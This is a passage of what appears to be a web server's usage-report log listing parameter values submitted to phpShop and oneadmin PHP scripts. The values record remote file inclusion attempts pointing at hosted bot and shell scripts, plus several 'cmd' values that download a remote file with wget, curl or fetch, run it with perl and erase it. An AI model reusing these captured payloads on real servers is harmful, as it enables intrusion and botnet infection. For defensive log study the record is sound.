Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
Parameter	mosConfig_absolute_path
Value	Accesses
http://ownsirc.googlepages.com/botnet.txt?	22
http://www.atkk3.xpg.com.br/bflood.txt??	1
OTHER:	947
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
Parameter	path[docroot]
Value	Accesses
http://200.58.115.64/~electrob/ow33.txt?	1
http://www.dpfsp.org/tester?	1
OTHER:	968
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
Parameter	mosConfig_absolute_path
Value	Accesses
http://201.11.36.8:32000/mail/test.jpg??	1
http://h1.ripway.com/capetacorpz/apx.txt?	1
OTHER:	968
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
Parameter	path[docroot]
Value	Accesses
http://pucorp.org/pbot.txt?	1
http://www3.bloglog.com.br/pbot.txt	1
http://ownedson.110mb.com/b.txt?	1
OTHER:	967
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
Parameter	mosConfig_absolute_path
Value	Accesses
http://64.32.13.169/ma.txt?	3
http://joaobenner.googlepages.com/script2.txt??	2
OTHER:	965
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
Parameter	path[docroot]
Value	Accesses
http://www.freewebs.com/scanspread/bot.txt?	1
OTHER:	969
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
Parameter	mosConfig_absolute_path
Value	Accesses
http://store.pointclick.ws/vsadmin/safe.txt?	2
http://www.ligseg.com.br/Etc/safe.gif?	1
OTHER:	967
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
Parameter	path[docroot]
Value	Accesses
http://www.capsoir.com/images/bu.txt	1
207.56.139.189/intru.txt	1
http://qlzr.iespana.es/p2.gif?	1
OTHER:	967
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
Parameter	cmd
Value	Accesses
cd /tmp;wget http://206.71.148.32/anaozao.txt;curl -O -f htt p://206.71.148.32/anaozao.txt;lynx -source http://206.71.148 .32/anaozao.txt;lwp-rget http://206.71.148.32/anaozao.txt;fe tch http://206.71.148.32/anaozao.txt;perl anaozao.txt;rm -rf anaozao.txt	4
OTHER:	966
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
Parameter	path[docroot]
Value	Accesses
http://www.houston-texas-online.com/beaddazzled/images/_note s/cpread.txt???	1
http://www.dreadsot.com/tester.txt?	1
OTHER:	968
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
Parameter	cmd
Value	Accesses
id	2
OTHER:	968
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
Parameter	path[docroot]
Value	Accesses
http://64.32.13.161/httc?	1
OTHER:	969
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
Parameter	cmd
Value	Accesses
cd /tmp;rm -rf *;cd /tmp;lwp-download http://br.geocities.co m/kaiooo.ownz/pacote.txt;fetch http://br.geocities.com/kaioo o.ownz/pacote.txt;curl -o pacote.txt http://br.geocities.com /kaiooo.ownz/pacote.txt;wget http://br.geocities.com/kaiooo. ownz/pacote.txt;perl pacote.txt	12
cd /tmp;rm botf.txt;wget http://71.41.190.203/botf.txt;fetch http://71.41.190.203/botf.txt;lwp-download http://71.41.190 .203/botf.txt;curl -O http://71.41.190.203/botf.txt;lynx htt p://71.41.190.203/botf.txt;perl botf.txt;rm -rf botf.txt*	2
Parameter	mosConfig_absolute_path
Value	Accesses
http://www2.binaryshadow.org:81/~w00t/my/tool/tool25.dat?	8
OTHER:	948
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
Parameter	path[docroot]
Value	Accesses
http://yahwek.fileave.com/inbox.txt?	1
OTHER:	969
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
Parameter	mosConfig_absolute_path
Value	Accesses
http://www.chamala.kit.net/tool25.txt?	26
http://normanzito.iespana.es/http.txt??	6
http://206.71.148.32/tool25.txt?	5
http://radio.radios.fm.br:8080/httd.txt?	4
http://www.cfr.cl/mail/bitch.txt??	4
OTHER:	925
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
Parameter	path[docroot]
Value	Accesses
http://www.freewebs.com/thelicor/php1.txt	1
OTHER:	969
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
Parameter	mosConfig_absolute_path
Value	Accesses
http://www.fuck-all.kit.net/pbot2.txt?	3
http://www.txd.conexaostore.com/tester?	3
http://www.stdr.xpg.com.br/priv8?	2
http://www.ligseg.com.br/id.gif?	2
http://h1.ripway.com/DiegoVirus/pbot2.txt?	2
OTHER:	958
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
Parameter	path[docroot]
Value	Accesses
http://www.zendurl.com/d/ddteam/cmdb.txt?	1
OTHER:	969
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
Parameter	mosConfig_absolute_path
Value	Accesses
http://64.32.13.161/httc?	2
http://www.ir4dex.kit.net/aln.txt?	1
http://sbc.sytu.edu.cn/rodador.txt???	1
OTHER:	966
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
Parameter	path[docroot]
Value	Accesses
http://raptor.we.bs/ind.txt?	1
OTHER:	969
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
Parameter	mosConfig_absolute_path
Value	Accesses
http://c0debank.altervista.org/tool25.dat?	1
OTHER:	969
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
Parameter	path[docroot]
Value	Accesses
http://electrobox106.com/ow33.txt??	1
OTHER:	969
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
Parameter	mosConfig_absolute_path
Value	Accesses
http://freewebtown.com/trabalho/CMD.txt?	1
OTHER:	969
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
Parameter	path[docroot]
Value	Accesses
http://maconha.us/tester?	1
http://brunas2.t35.com/lp.txt?	1
OTHER:	968
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
Parameter	mosConfig_absolute_path
Value	Accesses
http://206.71.148.89/pbot.txt??]	6
http://proxysx.t35.com/x0.txt?	5
OTHER:	959
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
Parameter	path[docroot]
Value	Accesses
http://www.epr0.kit.net/x/c?	1
http://br.geocities.com/daimonium007/tool.txt?	1
OTHER:	968
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
Parameter	mosConfig_absolute_path
Value	Accesses
http://freewebs.com/0m4rc170/zip.txt?	3
http://www.http://usuarios.arnet.com.ar/adrikrasnow/speed.tx t?	2
OTHER:	965
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
Parameter	path[docroot]
Value	Accesses
http://mensagem.hut2.ru/env.txt?	1
OTHER:	969
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
Parameter	mosConfig_absolute_path
Value	Accesses
http://infected1249.iespana.es/asc.txt?	2
http://x-tal.ajou.ac.kr/zeroboard/skin/zero_vote/tester.txt?	2
http://xsenharox.xpg.com.br/nfaehuaeh.txt?	2
OTHER:	964
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
Parameter	path[docroot]
Value	Accesses
http://www.oifotosbrasil.com/tester.txt?	1
http://c0debank.altervista.org/testphp.txt?	1
http://www.hackmsn.org/11.txt?	1
http://www.rj2008.kit.net/perl.txt?	1
http://www.l1nuxgroup.by.ru/id.txt	1
pemlk.onlinewebshop.net/pemlk.txt?	1
OTHER:	964
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
Parameter	mosConfig_absolute_path
Value	Accesses
http://69.93.214.234/~egacali/images/1.txt?	2
OTHER:	968
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
Parameter	path[docroot]
Value	Accesses
http://s3xy.ifrance.com/r7????	1
OTHER:	969
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
Parameter	mosConfig_absolute_path
Value	Accesses
http://www.freewebs.com/sur00tseclan/httd.txt?	4
OTHER:	966
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
Parameter	path[docroot]
Value	Accesses
http://www.rj2009.kit.net/p.txt??	1
OTHER:	969
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
Parameter	cmd
Value	Accesses
uname	1
Parameter	mosConfig_absolute_path
Value	Accesses
http://64.8.110.2/xpl/safe.txt?	2
OTHER:	967
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
Parameter	path[docroot]
Value	Accesses
http://rogiels.googlepages.com/teste.gif??	1
Parameter	s
Value	Accesses
r	1
OTHER:	968
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
Parameter	cmd
Value	Accesses
cd /tmp;wget http://kadbest1.free.fr/modules/tinycontent/adm in/spaw/bash/atrix.txt;curl -O -f http://kadbest1.free.fr/mo dules/tinycontent/admin/spaw/bash/atrix.txt;lynx -source htt p://kadbest1.free.fr/modules/tinycontent/admin/spaw/bash/atr ix.txt;lwp-rget http://kadbest1.free.fr/modules/tinycontent/ admin/spaw/bash/atrix.txt;fetch http://kadbest1.free.fr/modu les/tinycontent/admin/spaw/bash/atrix.txt;perl atrix.txt;rm -rf atrix.txt	1
cd /tmp;rm -rf *;cd /tmp;lwp-download http://h1.ripway.com/k aiooo/AllInOne.txt;fetch http://br.geocities.com/kaiooo.ownz /pacote.txt;curl -o AllInOne.txt http://h1.ripway.com/kaiooo /AllInOne.txt;wget http://h1.ripway.com/kaiooo/AllInOne.txt; perl AllInOne.txt	1
Parameter	mosConfig_absolute_path
Value	Accesses
http://overowns.googlepages.com/testera.txt?	11
http://204.11.228.115/id.txt?	9
http://xsenharox.xpg.com.br/suvbni?	4
http://www.vsm.gov.tr/ow33.txt?	3
http://hrrhq.dyndns.org/nuke//modules/Forums/admin/0123.jpg?	3
http://www.stdr.xpg.com.br/compito?	3
http://www.pucorp.t5.com.br/lp.txt?	3
http://bgeunivers.free.fr/modules/AllMyGuests/tool25.dat?	2
http://freewebs.com/normancito/kaka.txt??	2
http://200.58.115.64/~electrob/ow33.txt?	2
OTHER:	926
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
Parameter	path[docroot]
Value	Accesses
http://www.dropmachine.com/skins/advanced/config/tester.txt?	1
http://201.11.36.8:32000/mail/test.jpg??	1
OTHER:	968
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
Parameter	mosConfig_absolute_path
Value	Accesses
http://pc2you.ro/classes/phpmailer/config/tester.txt?	2
http://raptorupload.googlepages.com/inc3.txt??	2
OTHER:	966
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
Parameter	path[docroot]
Value	Accesses
http://javaatualiza.t35.com/uollll.txt?	1
OTHER:	969
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
Parameter	mosConfig_absolute_path
Value	Accesses
http://www.flyafac.com/images/kua.txt?	2
http://genealogystartswithone.name/chas-s/brasil.gif?	2
http://baixinho.50webs.com/x0.txt?	1
http://64.32.13.169/ma.txt?http://64.32.13.169/ma.txt?http:/ /64.32.13.169/ma.txt?http://64.32.13.169/ma.txt?	1
http://www.atkk3.xpg.com.br/rave.jpg?	1
OTHER:	963
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
Parameter	path[docroot]
Value	Accesses
http://vcsok.com/echo?http://www.freewebs.com/normancito/bot a.txt??	1
OTHER:	969
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
Parameter	mosConfig_absolute_path
Value	Accesses
http://www.nillo.com.br/IT.txt?	1
OTHER:	969
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
Parameter	path[docroot]
Value	Accesses
http://www.vwbr.com.br/virus.txt?	1
OTHER:	969
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
Parameter	mosConfig_absolute_path
Value	Accesses
ttp://h1.ripway.com/trance/ups	1
OTHER:	969
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
Parameter	path[docroot]
Value	Accesses
http://www.digownz.kit.net/dq1.txt?	1
OTHER:	969
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
Parameter	mosConfig_absolute_path
Value	Accesses
http://www.ilegais.xpg.com.br/spread.txt??	1
http://201.50.200.213:8080/httd.txt?	1
http://y3v.host.sk/c.txt??	1
http://scripts.crewhosting.com/httd.txt?	1
OTHER:	966
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
Parameter	path[docroot]
Value	Accesses
http://qlzr.iespana.es/killall.gif?	1
OTHER:	969
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
Parameter	mosConfig_absolute_path
Value	Accesses
http://www.atkk3.xpg.com.br/bflood.txt???	2
OTHER:	968
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
Parameter	path[docroot]
Value	Accesses
http://webmail.servidoreswin.com/bitch.txt???	1
OTHER:	969
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
Parameter	mosConfig_absolute_path
Value	Accesses
http://usuarios.arnet.com.ar/larry123/http.txt?	1
http://www.freewebtown.com/vibeblog/ty.txt?	1
http://snock.110mb.com/spread.txt???http://snock.110mb.com/s pread.txt???http://snock.110mb.com/spread.txt???http://snock .110mb.com/spread.txt???http://snock.110mb.com/spread.txt???	1
http://members.lycos.co.uk/gmtandi/a/cmd.txt?	1
OTHER:	966
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
Parameter	path[docroot]
Value	Accesses
http://yahwek.dll.googlepages.com/phpbot.txt?	1
OTHER:	969
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
Parameter	mosConfig_absolute_path
Value	Accesses
http://xsenharox.xpg.com.br/e_sempre_nois.txt?	1
www.txd.conexaostore.com/tester	1
OTHER:	968
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
Parameter	path[docroot]
Value	Accesses
http://www.capexoutsource.com/sp1.txt?	1
OTHER:	969
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
Parameter	mosConfig_absolute_path
Value	Accesses
http://www.fileupyours.com/files/156611/sc2.txt?	1
OTHER:	969
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
Parameter	path[docroot]
Value	Accesses
http://usuarios.arnet.com.ar/larry123/http??	1
http://ilegals.ifrance.com/bbc??	1
http://slcdelivery.com/banners/c.txt?	1
OTHER:	967
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
Parameter	mosConfig_absolute_path
Value	Accesses
http://www.gratisweb.com/tomcruise2005/tester.txt?	1
OTHER:	969
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
Parameter	path[docroot]
Value	Accesses
http://geocities.yahoo.com.br/bsthank/phpbot.txt?	1
OTHER:	969
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
Parameter	mosConfig_absolute_path
Value	Accesses
http://www.ligseg.com.br/Etc/24.gif?	1
http://gline.axspace.com/Gline.txt?	1
http://s33xy.ifrance.com/r7????	1
http://216.222.194.67/bitch.txt??	1
http://www.freewebs.com/sur00tseclan/httd.txt	1
Parameter	mosConfig_absolute_pathhttp://206.71.148.89/pbot.txt??]
Value	Accesses
	1
OTHER:	964
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
Parameter	path[docroot]
Value	Accesses
http://hackearhotmail.com/phpb.txt?http://hackearhotmail.com /phpb.txt?	1
OTHER:	969
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
Parameter	mosConfig_absolute_path
Value	Accesses
http://76.79.79.181/feia.txt?	1
OTHER:	969
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
Parameter	path[docroot]
Value	Accesses
http://216.222.194.67/bitch.txt????	1
http://proxysx.t35.com/x0.txt?	1
OTHER:	968
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
Parameter	mosConfig_absolute_path
Value	Accesses
http://hackearhotmail.com	1
OTHER:	969
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
Parameter	path[docroot]
Value	Accesses
http://smokan.fileave.com/bot3.txt?	1
http://x-tal.ajou.ac.kr/zeroboard/skin/zero_vote/evilx?	1
http://www.xplproxysx.kit.net/cmdxkn.txt?	1
http://orkutnova.100free.com/inbox.txt?	1
http://electrobox106.com/bpm456456461321654.txt?	1
http://qlzr2.iespana.es/sb4.gif?	1
http://arcadenoe.sapo.pt/files/php.txt?	1
http://pachyz.iespana.es/comando.txt?	1
OTHER:	962
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
Parameter	mosConfig_absolute_path
Value	Accesses
http://invisionarg.webcindario.com/eth0?	1
http://www.freewebtown.com/c4sh12345/cmd2.txt?	1
http://bocairent.net/phpmyadmin/README.txt?	1
http://www.ligseg.com.br/Etc/24.gif?http://www.ligseg.com.br /Etc/24.gif?	1
OTHER:	966
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
Parameter	path[docroot]
Value	Accesses
http://www.liceobrainstorm.cl/educacion//claroline/auth/exta uth/drivers/config/tester.txt?	1
http://xsenharox.xpg.com.br/suvbni?	1
http://www.vsm.gov.tr/aw33.txt?	1
OTHER:	967
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
Parameter	mosConfig_absolute_path
Value	Accesses
http://www.emroam.hpgvip.ig.com.br/cmd.gif?	1
OTHER:	969
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
Parameter	path[docroot]
Value	Accesses
http://qlzr.host.sk/sb4.gif?	1
OTHER:	969
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
Parameter	mosConfig_absolute_path
Value	Accesses
http://river.hostinggratisargentina.com/http?	1
http://bsthank.t35.com/spread.txt??	1
OTHER:	968
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
Parameter	path[docroot]
Value	Accesses
http://www.whoirc.org/netbot.txt?	1
http://smokan.xpl.googlepages.com/bot2.txt?	1
http://suspended.by.ru/php.txt?	1
www.pedr0.kit.net/new.txt?	1
OTHER:	966
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
Parameter	mosConfig_absolute_path
Value	Accesses
http://www.freewebs.com/haddem/botnetphp.txt	1
OTHER:	969
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
Parameter	path[docroot]
Value	Accesses
http://www.r0n4n.kit.net/HeheInbox.txt?	1
OTHER:	969
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
Parameter	mosConfig_absolute_path
Value	Accesses
http://www.liceobrainstorm.cl/educacion//claroline/auth/exta uth/drivers/config/tester.txt?	1
http://in.geocities.com/phpmailer_inbox/php.txt?	1
http://www.dolphins-youth.de/pear/goinbox.txt?	1
http://electrobox106.com/ow33.txt??	1
http://71.41.190.203/scanin.txt	1
OTHER:	965
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
Parameter	path[docroot]
Value	Accesses
http://www.comandante-do-bope.com/pbot.txt?	1
OTHER:	969
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
Parameter	mosConfig_absolute_path
Value	Accesses
http://www.xsenharox.xpg.com.br/pbot102030ig123.txt?	1
http://www.freewebs.com/xlip3/bot.txt?	1
OTHER:	968
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
Parameter	path[docroot]
Value	Accesses
http://www.abonesin.com/linxscan.txt?	1
OTHER:	969
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
Parameter	mosConfig_absolute_path
Value	Accesses
http://www.atkk3.xpg.com.br/inbox.txt?	1
http://members.lycos.co.uk/enviescraps/pbot.txt?	1
http://216.222.194.67/~crew/bitch.txt??	1
http://yahwek.dll.googlepages.com/phpbot.txt?	1
http://infected1249.iespana.es/r57.txt?	1
OTHER:	965
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
Parameter	path[docroot]
Value	Accesses
http://mail.admnyagan.ru/config/exp667.txt?	1
OTHER:	969
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
Parameter	mosConfig_absolute_path
Value	Accesses
http://h1.ripway.com/enviandodidi/vivo.jpg?	1
OTHER:	969
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
Parameter	path[docroot]
Value	Accesses
http://www.chapolin-ownz.us/inbox.txt?	1
http://epr0.kit.net/xulapa.txt?	1
http://vsffdp.iespana.es/testeinbox2.txt?	1
http://www.baltmusic.lv/htmlarea/lang/_vtni_cgi_/testamc.txt ?	1
http://www.freewebs.com/chadalua/b0t.txt?	1
http://www.ilegais.xpg.com.br/makronaa?????	1
http://www.cfr.cl/mail/bot.txt??	1
OTHER:	963
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
Parameter	mosConfig_absolute_path
Value	Accesses
http://www.atkk3.xpg.com.br/botlogin.txt?	1
http://www.franchinishop.com.br/fotos/faroffero.txt?	1
http://lifetogether.us./lt/family/bitch.txt??	1
OTHER:	967
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
Parameter	path[docroot]
Value	Accesses
http://lifetogether.us./lt/family/bitch.txt???	1
OTHER:	969
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
Parameter	mosConfig_absolute_path
Value	A